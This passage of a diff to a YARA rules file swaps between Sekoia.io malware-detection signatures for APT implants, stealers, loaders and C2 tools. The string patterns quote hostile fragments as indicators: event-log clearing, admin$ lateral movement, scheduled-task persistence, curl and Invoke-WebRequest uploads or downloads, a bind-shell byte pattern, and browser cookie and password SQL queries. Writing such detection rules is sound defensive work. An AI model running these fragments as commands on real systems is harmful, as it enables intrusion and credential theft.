-		pe.imphash( ) == "8e1ee04a99c77bd54c6dc55214ffa2e3" or hash.md5 ( pe.rich_signature.clear_data ) == "67e8e8b75b981b5c8ff31149dc2c61b2" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "7c6adf9987e6dfbf19b5f156b0314798" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "46fa9f5a035c8ae8de1a0d14150bd5ef" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f7895f9456f8d51125e6744960c38133" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5d82bb8a7ef37c417615381b446f715c" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "d7808c6662f098e685040f7c61bc033d9e73002f674de7cf2ffcd6230d60d429" )
+		uint16( 0 ) == 0x5A4D and all of them and filesize > 60KB and filesize < 120KB
 }
-rule SEKOIA_Apt_Luckymouse_Sysupdate_Removing_Tool : FILE
+rule SEKOIA_Apt_Implant_Xdealer_Linux_Variant_Strings : FILE
 {
 	meta:
-		description = "Detects the SysUpdate removing tool"
+		description = "Detects XDealer linux variant"
 		author = "Sekoia.io"
-		id = "711d059c-6229-49ef-aa20-a04d505838dc"
-		date = "2022-08-03"
+		id = "42690513-753f-4296-b641-4d3b59a5e5e1"
+		date = "2024-03-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_luckymouse_sysupdate_removing_tool.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_implant_xdealer_linux_variant_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6a23fac99f26f4b0f9099e435ad53d9e83bf1322d190c565abf0c06dceeeaf34"
+		logic_hash = "400beb53d0f7b7727962175c7c4f8dfccdfed56bb3978d3e847147e8ad7644fb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249838,27 +249829,29 @@ rule SEKOIA_Apt_Luckymouse_Sysupdate_Removing_Tool : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "KsWAYYYXXsFUCK" wide
-		$ = "remove Services:%s %d" wide
-		$ = "remove dir:%s %d" wide
-		$ = "remove reg %d" wide
+		$ = "ls -l /proc/%s/exe"
+		$ = "Linux_%s_%s_%u"
+		$ = "chkconfig --add"
+		$ = "cmd over return [%s]"
+		$ = "touch   -d"
+		$ = "%s can't be opened/n"
+		$ = "/proc/%s/status"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 11MB and 2 of them
+		uint32be( 0 ) == 0x7f454c46 and 3 of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Aptk47_Maliciouslnk : FILE
+rule SEKOIA_Apt_Sandworm_Notpetya_Strings : FILE
 {
 	meta:
-		description = "Detects APT-K-47 malicious LNK"
+		description = "Detects NotPetya worm"
 		author = "Sekoia.io"
-		id = "2ccc8777-26fe-4018-9646-4ea91394fe78"
-		date = "2024-11-22"
+		id = "c6021638-1b59-4d20-a29d-95cabf256a28"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_aptk47_maliciouslnk.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_notpetya_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "6a405d4e88b4acb9706e19a83aad9cf6"
-		logic_hash = "865bb08f57affb3795853aa3c9f49577efb74df9b32e7760263b9fb08246a3ab"
+		logic_hash = "5600071de4b4022a71c48fbcd4b5e47ff6dfa291cc5eac65720bbf763068a6e3"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249866,64 +249859,55 @@ rule SEKOIA_Apt_Aptk47_Maliciouslnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[/c for /f" wide
-		$ = "2^>nul') do copy" wide
-		$ = "%F in ('where /r %Temp%" wide
+		$ = "wevtutil cl Security &" wide
+		$ = "wevtutil cl System &" wide
+		$ = "u%s \\%s -accepteula -s" wide
+		$ = "\\\\%ws\\admin$\\%ws" wide
+		$ = "\\\\%s\\admin$" wide
+		$ = "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1" wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Backdoor_Win_Warhawk
+rule SEKOIA_Apt_Apt41_Keyplug_Dropper : FILE
 {
 	meta:
-		description = "Detect the WarHawk backdoor used by the SideWinder intrusion-set"
+		description = "Detects a dropper used by keyplug"
 		author = "Sekoia.io"
-		id = "d0ec19a7-cb08-4bca-b153-d7b0358186b4"
-		date = "2022-10-24"
+		id = "b6740371-c4c3-437e-8235-0bd4f7b9c3f5"
+		date = "2024-06-12"
 		modified = "2024-12-19"
-		reference = "https://www.zscaler.com/blogs/security-research/warhawk-new-backdoor-arsenal-sidewinder-apt-group-0"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_warhawk.yar#L1-L56"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt41_keyplug_dropper.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "09cd60f91c54da6ca051550c89629d11a55a89d5b0d5f6d5696232b4edfdd491"
+		logic_hash = "a61f57302d8fe58ed8b77542c94159acbc36a3bd52c204171e76e668d10a74e7"
 		score = 75
-		quality = 58
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash_exe1 = "7d3574c62df44b74337fc74ec7877792b4ffa1486a49bb19668433c3ca8836b5"
-		hash_exe2 = "624c6b56ee3865f4a5792ad1946a8e86b876440a5af3bac22ac1dee92f1b7372"
-		hash_iso1 = "58b3686e4255d32dbcf7dee9dac1d5be6d4692d086cde167da1e1a5e0e1b315a"
-		hash_iso2 = "f97d5d3e1c2ceb3e9d23ae5b5d4e7c9857155df5acf7f67fee995cb041c797dc"
 
 	strings:
-		$ = {7b205c226e616d655c223a205c2225735c222c205c2273697a655c223a205c225c222c205c226d6f645c223a205c2225735c222c205c22747970655c223a205c2246696c6520666f6c6465725c22207d2c}
-		$ = {7b20225f68776964223a20222573222c20225f636f6d7075746572223a20222573222c20225f757365726e616d65223a20222573222c20225f6f73223a2022257322207d}
-		$ = {7b5c226e616d655c223a205c2225735c222c205c22747970655c223a205c2225735c227d2c}
-		$ = {7b20225f68776964223a20222573222c20225f66696c656d67725f646f6e65223a202274727565222c20225f726573706f6e7365223a2022257322207d}
-		$ = {7b20225f68776964223a20222573222c20225f7461736b223a20227472756522207d}
-		$ = {7b20225f68776964223a20222573222c20225f7461736b5f646f6e65223a202274727565222c20225f6964223a2022257322207d}
-		$ = {7b20225f68776964223a20222573222c20225f636d64223a20227472756522207d}
-		$ = {7b20225f68776964223a20222573222c20225f636d645f646f6e65223a202274727565222c20225f726573706f6e7365223a2022257322207d}
-		$ = {7b20225f68776964223a20222573222c20225f66696c656d6772223a20227472756522207d}
-		$ = {7b20225f68776964223a2022257322207d}
-		$ = {7b20225f68776964223a20222573222c20225f70696e67223a20227472756522207d}
-		$ = "cmd.exe"
+		$ = "C:\\ProgramData\\pfm.ico" wide
+		$ = "C:\\\\ProgramData\\\\pfm.ico" wide
+		$ = "67f8de349abc5ghi" wide
+		$ = "3abc64597f8diegh" wide
 
 	condition:
-		all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 2MB and any of them
 }
-rule SEKOIA_Infostealer_Win_Monster_Stub : FILE
+rule SEKOIA_Loader_Win_Bumblebee : FILE
 {
 	meta:
-		description = "Finds Monster Stealer stub (Python payload) based on specific strings."
+		description = "Detect BUMBLEBEE based on specific strings"
 		author = "Sekoia.io"
-		id = "10d27d49-79ae-4edc-8c30-35506bdf2c42"
-		date = "2024-08-07"
+		id = "ff36f512-c700-4f52-bc89-68ab9c69462c"
+		date = "2022-04-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_monster_stub.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_bumblebee.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d6362c54b1f56ffa878423fbb1a3f57508d20e06b573c732f892494178a49200"
+		logic_hash = "97755e8d593acbc9acc8ce7f1a82a345fc7eea049addbb96577f6abc1b6d5fd6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249931,39 +249915,25 @@ rule SEKOIA_Infostealer_Win_Monster_Stub : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "https://t.me/monster_free_cloud" ascii
-		$str02 = "MonsterUpdateService" ascii
-		$str03 = "Monster.exe" ascii
-		$str04 = "schtasks /create /f /sc daily /ri 30 /tn" ascii
-		$str05 = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\" ascii
-		$str06 = "banned_uuids" ascii
-		$str07 = "banned_computer_names" ascii
-		$str08 = "banned_process" ascii
-		$str09 = "register_X_browsers" ascii
-		$str10 = "register_payload" ascii
-		$str11 = "tiktok_sessions.txt" ascii
-		$str12 = "spotify_sessions.txt" ascii
-		$str13 = "network_info.txt" ascii
-		$str14 = "lolz.guru" ascii
-		$str15 = "echo ####System Info####" ascii
-		$str16 = "echo ####Firewallinfo####" ascii
-		$str17 = "/injection/main/injection.js" ascii
+		$str0 = "Z:\\hooker2\\Common\\md5.cpp" wide
+		$str1 = "3C29FEA2-6FE8-4BF9-B98A-0E3442115F67" wide
+		$str2 = "bumblebee" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule SEKOIA_Apt_Rusticweb_Stealer : FILE
+rule SEKOIA_Tool_Powershell_Unicorn : FILE
 {
 	meta:
-		description = "Detects stealer used by RusticWeb"
+		description = "Detects Unicorn Powershell"
 		author = "Sekoia.io"
-		id = "813072e0-28de-4cb7-b2cc-71d77a1e8508"
-		date = "2024-01-09"
+		id = "287c1669-2ee1-488e-bf66-a99bfe309c90"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_rusticweb_stealer.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_powershell_unicorn.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "68f802ef442e68cbcca789eae2bb8a4395af86699320e5a8101c07469e7555fb"
+		logic_hash = "8be79789cf77d4f304d9fef4ad6a2d2ac7686b015fff3301fb3e369f2f06230a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249971,28 +249941,25 @@ rule SEKOIA_Apt_Rusticweb_Stealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "-FTT=@"
-		$s2 = "https://oshi.at"
-		$s3 = "curl-T"
-		$s4 = "upload/upload.php"
-		$s5 = "cargo"
+		$ = ").value.toString() ('JAB" ascii wide
+		$ = ").value.toString());powershell (" ascii wide
+		$ = "powershell /w 1 " ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 4MB and 3 of them
+		all of them and filesize < 100KB
 }
-
-rule SEKOIA_Merlin_Win_Exe : FILE
+rule SEKOIA_Apt_Tealkurma_Snappytcp_Strings : FILE
 {
 	meta:
-		description = "Detects Merling agent (PE)"
+		description = "Detects TealKurma SnappyTCP shell script"
 		author = "Sekoia.io"
-		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be4"
-		date = "2022-01-03"
+		id = "6bbee6d6-f490-4550-bd61-a643f93a8788"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/merlin_win_exe.yar#L4-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_tealkurma_snappytcp_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6a42e9ea9749dc894788d80cd4395da026ef3c49eab1de6802e09f8b1751f5bd"
+		logic_hash = "b91adef3332850d952cace104fc05e1b09e6175a27ae991905defc46de608e88"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250000,26 +249967,27 @@ rule SEKOIA_Merlin_Win_Exe : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "B.symtab" ascii
-		$s2 = "github.com/Ne0nd0g/merlin" ascii
-		$s3 = "github.com/lucas-clemente" ascii
-		$s4 = "SendMerlinMessage" ascii
+		$s1 = "#!/bin/bash" ascii
+		$s2 = "2>&1>/dev/null&" ascii
+		$s3 = "PATH=$PATH:$PWD;" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "07b5472d347d42780469fb2654b7fc54" ) and all of them and $s1 at 591 and filesize < 15MB
+		$s1 at 0 and $s2 at filesize -16 and $s3 and filesize < 300
 }
-rule SEKOIA_Crypter_Win_Dotrunpex : FILE
+rule SEKOIA_Apt_Apt29_Wineloader_Malicious_Pdf : FILE
 {
 	meta:
-		description = "Detect the dotRunpeX crypter based on strings"
+		description = "Detects malicious PDF used by APT29 to drop Wineloader"
 		author = "Sekoia.io"
-		id = "6fb4ffe0-3a5c-432c-8ae2-404bb5960c30"
-		date = "2023-06-08"
+		id = "b1db731e-471e-493a-b76c-38d2808ccac9"
+		date = "2024-03-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crypter_win_dotrunpex.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt29_wineloader_malicious_pdf.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8a2b9e19b49ba17f976241bec5323121ba13d2ce39fdcf2777fd97a230211e75"
+		hash = "9712217ff3597468b48cdf45da588005de3a725ba554789bb7e5ae1b0f7c02a7"
+		hash = "3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9"
+		logic_hash = "784f5ab2602e2185e8253b5b8d9a084ede0604457b0a0674fceffbcb226e3ba1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250027,23 +249995,26 @@ rule SEKOIA_Crypter_Win_Dotrunpex : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {52 00 75 00 6e 00 70 00 65 00 58 00 2e 00 53 00 74 00 75 00 62 00 2e 00 46 00 72 00 61 00 6d 00 65 00 77 00 6f 00 72 00 6b 00 2e 00 65 00 78 00 65}
+		$s1 = "<</Type/Annot/Subtype/Link/Border[0 0 0]/Rect["
+		$s2 = "/A<</Type/Action/S/URI/URI("
+		$s3 = { 2f [2-10] 2e 70 68 70 29 3e 3e }
+		$s4 = "JamrulNormal"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint32be( 0 ) == 0x25504446 and $s2 in ( @s1 .. @s3 ) and $s4
 }
-rule SEKOIA_Apt_Nobelium_Acrobox_Downloader_Apr2022 : FILE
+rule SEKOIA_Apt_Badmagic_Ld_Dll_Loader_Pshscript : FILE
 {
 	meta:
-		description = "Detects AcroBox downloader"
+		description = "Detects BadMagic DLL Loader powershell script"
 		author = "Sekoia.io"
-		id = "77f7f01d-72a2-4b13-b23f-d938a415dd40"
-		date = "2022-05-11"
+		id = "d4a23afc-693f-4fab-b2c4-15eecba047f7"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_nobelium_acrobox_downloader_apr2022.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_ld_dll_loader_pshscript.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ebcbdf13908971eea3e5b291719527e2e454a9ee3b98b5dc66149b2bb3b8fe67"
+		logic_hash = "8482521fe1f90c008948e551df35448b870145cf8b58f3c5019cafb66bb0ae36"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250051,62 +250022,49 @@ rule SEKOIA_Apt_Nobelium_Acrobox_Downloader_Apr2022 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { 80 ?? 7B
-        0F 84 ?? ?? 00 00
-        80 ?? ?? 0F
-        0F 84 ?? ?? 00 00
-        80 ?? ?? 0F
-        0F 84 ?? ?? 00 00
-        80 ?? ?? 0F
-        0F 84 ?? ?? 00 00 }
+		$ = "$ModulePath = \"$folder_path\\$name"
+		$ = "$ModuleExport ="
+		$ = "start-job -ScriptBlock $ScriptBlock"
+		$ = "Invoke-WebRequest -Uri"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of ( $s* )
+		all of them and filesize < 1KB
 }
 
-rule SEKOIA_Loader_Win_Ninerat
+rule SEKOIA_Apt_Windows_Wip19_Screencap : FILE
 {
 	meta:
-		description = "Detect the NineRAT instrumentator"
+		description = "Detects ScreenCap resource"
 		author = "Sekoia.io"
-		id = "b9aa3ddc-7892-402f-b045-182884ee9bad"
-		date = "2023-12-12"
+		id = "ebf5d2c5-81c9-45c3-aa61-05870f800f6b"
+		date = "2022-10-18"
 		modified = "2024-12-19"
-		reference = "https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_ninerat.yar#L4-L37"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_windows_wip19_screencap.yar#L4-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "eab81277a2ffe926c2d9f990ee2e36f0e5f27a14d3048c50d31952d90ce7ab0b"
+		logic_hash = "02479f0c8199b31f089608da0f44f1487b75790cb31c77bb65ca1fb0fd57ac0d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4"
-		hash2 = "5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541"
-
-	strings:
-		$ = "TelegramRat\\lastest\\Dropper"
-		$ = "\\Release\\ServiceMid.pdb"
 
 	condition:
-		all of them or pe.imphash ( ) == "104a3dc970a385f64de39e0dad61a9a2" or hash.md5 ( pe.rich_signature.clear_data ) == "aab0aa6b89d883e42be8b65a4e41a139" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "827d5fd4b1a0426037529ee9bba48da0" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "82354f92508dcb33acda01c226de2975" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ccd0f5d837a6cc05a861f040cbdfe080" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "8d2c169356afe8b53b0ecb83de3084b9" )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "89f4d0e3f7f3318270aa9c8345c1402202b1a02ffefc03c7a86636e297aa0ffc" ) and filesize < 2MB
 }
-rule SEKOIA_Unknown_7777_Xlogin : FILE
+rule SEKOIA_Malicious_Lnk_Exploiting_Webdav_Share_Generic : FILE
 {
 	meta:
-		description = "Detects the xlogin bind shell and its variants"
+		description = "Detects some malicious LNK"
 		author = "Sekoia.io"
-		id = "ce0beffc-f957-43ef-a739-f4a1099a7a67"
-		date = "2024-07-18"
+		id = "b228643c-ab23-46e1-b170-3da6bcb2dd23"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/unknown_7777_xlogin.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malicious_lnk_exploiting_webdav_share_generic.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "4d9067e7cf517158337123a30a9bd0e3"
-		hash = "43ea387b8294cc4d0baaef6d26ff7c72"
-		hash = "777d6f907da38365924a0c2a12e973c5"
-		hash = "8542a3cbe232fe78baa0882736c61926"
-		logic_hash = "1c38d8019734affdebac32050097bbcf89e9069fb2145a976588eca04ecc78df"
+		hash = "cffb40e13e3aa6761330090b42314c36"
+		logic_hash = "8179ef8ac43cb67a1b70baf7824452834f498d988df84e138c857ac0ef164b4b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250114,84 +250072,103 @@ rule SEKOIA_Unknown_7777_Xlogin : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$string1 = { 2f 62 69 6e 2f 73 68 00 2f 74 6d 70 2f 6c 6f 67 69 6e }
-		$string2 = { 2F 64 65 76 2F 6E 75 6C 6C [1-3] 2F 62 69 6E 2F 73 68 00 2D 63 }
+		$ = "powershell.exe" wide
+		$ = "-Name explorer; \\\\" wide
+		$ = "@80\\"
+		$ = "desktop-tcrdu4c"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 180KB and ( ( @string2 - @string1 < 3400 ) )
+		uint32be( 0 ) == 0x4c000000 and 2 of them
 }
-rule SEKOIA_Infostealer_Win_Ginzostealer_Str : FILE
+rule SEKOIA_Apt_Unc4990_Explorer_Ps1
 {
 	meta:
-		description = "Finds samples of the Ginzo Stealer"
+		description = "Detects powershell script (explorer.ps1)"
 		author = "Sekoia.io"
-		id = "ef87e94b-9c53-44b4-b8a1-87d371a6d2cb"
-		date = "2022-04-21"
+		id = "2e1abbbf-f9b7-4147-b7da-3544cbc4a5f1"
+		date = "2024-02-01"
 		modified = "2024-12-19"
-		reference = "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_ginzostealer_str.yar#L1-L20"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unc4990_explorer_ps1.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b1c811a13cf0f632ac839b6a6de050fc59ffe3ed0704545feff02e13521ea53f"
+		logic_hash = "5085f738e23b801c7e36408d189755086d91c0bb266af6738c80510eb85e598f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "Ginzo.pdb" ascii
-		$str1 = "Ginzo.exe" wide
-		$str2 = "SELECT creation_utc,top_frame_site_key,host_key,name,value,encrypted_value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party FROM cookies" wide
-		$str3 = "SELECT origin_url,action_url,username_element,username_value,password_element,password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for,date_password_modified FROM logins" wide
-		$str4 = "SELECT id,originAttributes,name,value,host,path,expiry,lastAccessed,creationTime,isSecure,isHttpOnly,inBrowserElement,sameSite,rawSameSite,schemeMap FROM moz_cookies" wide
+		$s0 = "$(get-location).Path"
+		$s1 = "+ \"\\Runtime Broker.exe"
+		$s2 = "Start-Process -FilePath"
+		$s3 = "-Wait;"
+		$s4 = "Start-Sleep -s"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 4 of them
+		all of them and @s3- @s2 < 35
 }
-rule SEKOIA_Infostealer_Win_Lumma_Strings_Aug23 : FILE
+rule SEKOIA_Tool_Xiebroc2_Strings
 {
 	meta:
-		description = "Finds Lumma samples based on the specific strings"
+		description = "Detects XiebroC2 based on strings"
 		author = "Sekoia.io"
-		id = "728f7825-a463-4b19-b2d3-3460e4c06dc9"
-		date = "2023-09-14"
+		id = "8451878e-5371-440b-b8ac-f9e6f7643d3c"
+		date = "2024-09-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_lumma_strings_aug23.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_xiebroc2_strings.yar#L1-L40"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "704a31b0f7c30602305768f13bf6108ebaf08c62451833731d2f2f020efce386"
+		hash = "84e665bcbf963a2cf67d879aa3422d79"
+		hash = "3558c376420724694ba244a2e2acd20c"
+		hash = "e29fb9cd825db51a7a2e519f188e61ba"
+		hash = "a3b31739ad5eed51277c8478a83160a3"
+		hash = "d6e2499ea7fe8f047da1a95dae16d2c3"
+		hash = "1616818b65bf49d985bb1816461a4a75"
+		hash = "2e72d3ef2492088a4623d77d5e419ab8"
+		hash = "351770f860507d652ec3644ed1988f7f"
+		hash = "58fa6ad96028753ba8b0b0ed8fa6dccb"
+		hash = "607b541525b27eeefbef1455397bff35"
+		hash = "c2a242612468814e2e951e4db3762059"
+		hash = "431e275f4e43ec4ef7c2cc8ba126e9d3"
+		hash = "ace54bd32c226a7b9a6d4d53791e4021"
+		hash = "f22c21ed7bba1ddfc42ffdc66da3a4dd"
+		hash = "9a5ff9e07ed04cb0e71102cf1aae380c"
+		hash = "d20e01a1af3f40a7a9646d7e7df1b42e"
+		hash = "5544b621c9772cd32c4db77a0e59515a"
+		logic_hash = "f3be31e0f1ad8e8bce132d861de5068340653547d786378f9b8045382f40939f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "lid=%s&j=%s&ver" ascii
-		$str02 = "%s (%d.%d.%d)" ascii
-		$str03 = "- Screen Resoluton:" ascii
-		$str04 = "- Physical Installed Memory:" ascii
-		$str05 = "Content-Type: attachment/x-object" ascii
-		$str06 = "Content-Type: application/x-www-form-urlencoded" ascii
-		$str07 = "Content-Type: multipart/form-data; boundary=%s" wide
-		$str08 = "SysmonDrv" wide
-		$str09 = "TeslaBrowser/5.5" wide
+		$s1 = "RemarkClientColor"
+		$s2 = "HandlePacket"
+		$s3 = "-hide"
+		$s4 = "Failed to send data:"
+		$s5 = "Pac_ket"
+		$s6 = "WANip"
+		$s7 = "%s %s && Kernel: %s"
+		$g1 = "go.buildid"
